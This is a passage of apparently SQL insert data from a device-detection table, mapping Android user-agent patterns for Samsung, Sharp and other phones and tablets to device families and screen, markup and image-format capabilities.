Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-J110F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-J110G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-J110H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-J110L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-N7505) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-N900) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-N9005) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-N9006) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-N900W8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-N910F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-T530) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-T535) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-T535-ORANGE) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG-SCH-I699I) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG-SGH-I257) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG-SGH-I317) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG-SGH-I337) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG-SGH-I337) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG-SGH-I467) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sgh','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG-SGH-I527) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG-SGH-I537) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG-SGH-I717) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG-SGH-I727) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG-SGH-I747) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG-SGH-I747) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG-SM-G360AZ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG-SM-G360AZ) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG-SM-G530AZ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG-SM-G730A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG-SM-G800A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG-SM-G850A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG-SM-G870A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG-SM-G900A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG-SM-N900A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG-SM-N910A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SANTIN #Armor) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SC-01G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SC-03E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SC-06D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SCH-I435) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SCH-I535) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SCH-I535) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SCH-I545) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SCH-I605) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SCH-N719) AppleWebKit/* (KHTML, like Gecko) YisouSpider/1.0 Mobile Safari/*','android_samsung','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SCH-R530C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SCH-R890) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SCH-R970C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SD4930UR) AppleWebKit/* (KHTML, like Gecko) Silk like Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SENSEIT R390) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SGH-I257M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SGH-I317M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SGH-I337M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SGH-I527M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SGH-I547C) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SGH-I747M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SGH-I747M) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SGH-I747M-parrot) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SGH-M919) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SGH-M919N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SGH-M919V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SGH-S730M) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SGH-T399) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SGH-T399N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SGH-T599) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SGH-T599N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SGH-T599N) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SGH-T889) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SGH-T889) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SGH-T989) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SGH-T989D) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SGH-T999) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SGH-T999) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SGH-T999L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SGH-T999L) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SGH-T999V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SH-01F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SH-02G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SH-06F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SH-08E) AppleWebKit/* (KHTML, like Gecko) Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SH825Wi) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SHL23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 